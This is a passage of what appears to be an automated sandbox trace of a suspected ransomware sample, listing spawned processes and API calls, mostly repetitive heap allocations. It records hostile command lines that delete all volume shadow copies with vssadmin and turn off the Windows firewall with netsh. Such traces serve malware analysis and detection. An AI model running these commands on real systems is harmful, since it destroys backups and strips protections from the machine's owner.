lpAttributeList=0x18f238 | out: lpAttributeList=0x18f238) [0191.181] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.181] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.182] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.182] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e9e194 | out: lpMode=0x49e9e194) returned 1 [0191.183] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.183] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e9e198 | out: lpMode=0x49e9e198) returned 1 [0191.183] SetConsoleInputExeNameW () returned 0x1 [0191.183] GetConsoleOutputCP () returned 0x1b5 [0191.183] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eabfe0 | out: lpCPInfo=0x49eabfe0) returned 1 [0191.183] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0191.184] exit (_Code=0) Process: id = "5" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x43962000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x5e0" cmd_line = "vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0xbf8 Thread: id = 70 os_tid = 0x928 Thread: id = 71 os_tid = 0xbec Thread: id = 72 os_tid = 0xbf0 Thread: id = 73 os_tid = 0xbf4 Process: id = "6" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x44be0000" os_pid = "0x938" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x5bc" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 69 os_tid = 0x918 Thread: id = 74 os_tid = 0xb94 Thread: id = 81 os_tid = 0x9d8 Thread: id = 95 os_tid = 0x9e8 Thread: id = 96 os_tid = 0x5f4 Process: id = "7" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x43947000" os_pid = "0xb80" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:000624ef" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 75 os_tid = 0x9c8 Thread: id = 76 os_tid = 0xaf0 Thread: id = 77 os_tid = 0x5e4 [0121.084] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe5da40 | out: lpSystemTimeAsFileTime=0xe5da40*(dwLowDateTime=0x98f5600, dwHighDateTime=0x1d68bad)) [0121.084] GetCurrentProcessId () returned 0xb80 [0121.084] GetCurrentThreadId () returned 0x5e4 [0121.084] GetTickCount () returned 0x11536ca [0121.084] QueryPerformanceCounter (in: lpPerformanceCount=0xe5da48 | out: lpPerformanceCount=0xe5da48*=24136038756) returned 1 [0121.084] malloc (_Size=0x100) returned 0x108e80 [0224.965] free (_Block=0x108e80) Thread: id = 78 os_tid = 0xa60 Thread: id = 79 os_tid = 0xb1c Thread: id = 80 os_tid = 0xa70 Thread: id = 82 os_tid = 0xb68 Thread: id = 99 os_tid = 0xb10 Thread: id = 100 os_tid = 0x3a4 Thread: id = 313 os_tid = 0x928 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 83 os_tid = 0x9a4 Thread: id = 84 os_tid = 0x8a4 Thread: id = 85 os_tid = 0x878 Thread: id = 86 os_tid = 0x768 Thread: id = 87 os_tid = 0x764 Thread: id = 88 os_tid = 0x758 Thread: id = 89 os_tid = 0x724 Thread: id = 90 os_tid = 0x718 Thread: id = 91 os_tid = 0x714 Thread: id = 92 os_tid = 0x154 Thread: id = 93 os_tid = 0x118 Thread: id = 94 os_tid = 0xf0 Thread: id = 97 os_tid = 0x9b8 Thread: id = 98 os_tid = 0x9a8 Thread: id = 197 os_tid = 0xb54 Thread: id = 253 os_tid = 0x38c Thread: id = 254 os_tid = 0xb74 Thread: id = 312 os_tid = 0x520 Thread: id = 317 os_tid = 0xa20 Thread: id = 318 os_tid = 0xa10 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4354d000" os_pid = "0x9f8" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00062bc5" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 101 os_tid = 0xb4c Thread: id = 102 os_tid = 0xab8 Thread: id = 103 os_tid = 0x998 Thread: id = 104 os_tid = 0xbfc Thread: id = 105 os_tid = 0xbe4 Thread: id = 106 os_tid = 0xa28 Thread: id = 107 os_tid = 0xb20 Thread: id = 314 os_tid = 0xbf0 Process: id = "10" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x40110000" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbe0" cmd_line = "\"netsh.exe\" Advfirewall set allprofiles state off" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 108 os_tid = 0xb30 [0126.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af890 | out: lpSystemTimeAsFileTime=0x1af890*(dwLowDateTime=0xc48c8e0, dwHighDateTime=0x1d68bad)) [0126.862] GetCurrentProcessId () returned 0xb2c [0126.862] GetCurrentThreadId () returned 0xb30 [0126.862] GetTickCount () returned 0x11548a5 [0126.862] QueryPerformanceCounter (in: lpPerformanceCount=0x1af898 | out: lpPerformanceCount=0x1af898*=24713828598) returned 1 [0126.863] GetModuleHandleW (lpModuleName=0x0) returned 0x1350000 [0126.863] __set_app_type (_Type=0x1) [0126.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x135ad14) returned 0x0 [0126.863] __wgetmainargs (in: _Argc=0x13655c0, _Argv=0x13655d0, _Env=0x13655c8, _DoWildCard=0, _StartInfo=0x13655dc | out: _Argc=0x13655c0, _Argv=0x13655d0, _Env=0x13655c8) returned 0 [0126.864] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.864] GetModuleHandleW (lpModuleName=0x0) returned 0x1350000 [0126.864] _vsnwprintf (in: _Buffer=0x1367a40, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x1a73e8 | out: _Buffer="netsh>") returned 6 [0126.864] GetProcessHeap () returned 0x2b0000 [0126.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d07a0 [0126.864] GetProcessHeap () returned 0x2b0000 [0126.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d07c0 [0126.864] GetProcessHeap () returned 0x2b0000 [0126.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d07e0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0800 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0820 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0840 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0890 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d08b0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d08d0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d08f0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0910 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0930 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0950 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0970 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0990 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d09b0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d09d0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d09f0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0a10 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0a30 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0a50 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0a70 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0a90 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0ab0 [0126.865] GetProcessHeap () returned 0x2b0000 [0126.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0ad0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0af0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0b10 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0b30 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0b50 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0b70 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0b90 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0bb0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0bd0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0bf0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0c10 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0c30 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0c50 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0c70 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0c90 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0cb0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0cd0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0cf0 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0d10 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0d30 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0d50 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0d70 [0126.866] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0d90 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0db0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0dd0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0df0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0e10 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0e30 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0e50 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0e70 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0e90 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0eb0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0ed0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0ef0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0f10 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0f30 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0f50 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0f70 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0f90 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0fb0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0fd0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d0ff0 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1010 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.867] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1030 [0126.867] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1090 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d10b0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d10d0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d10f0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1110 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1130 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1150 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1170 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1190 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d11b0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d11d0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d11f0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1210 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1230 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1250 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1270 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1290 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d12b0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d12d0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d12f0 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1310 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.868] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1330 [0126.868] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1350 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1370 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1390 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d13b0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d13d0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d13f0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1410 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1430 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1450 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1470 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1490 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d14b0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d14d0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d14f0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1510 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1530 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1550 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1570 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1590 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d15b0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d15d0 [0126.869] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d15f0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1610 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1630 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1650 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1670 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1690 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d16b0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, 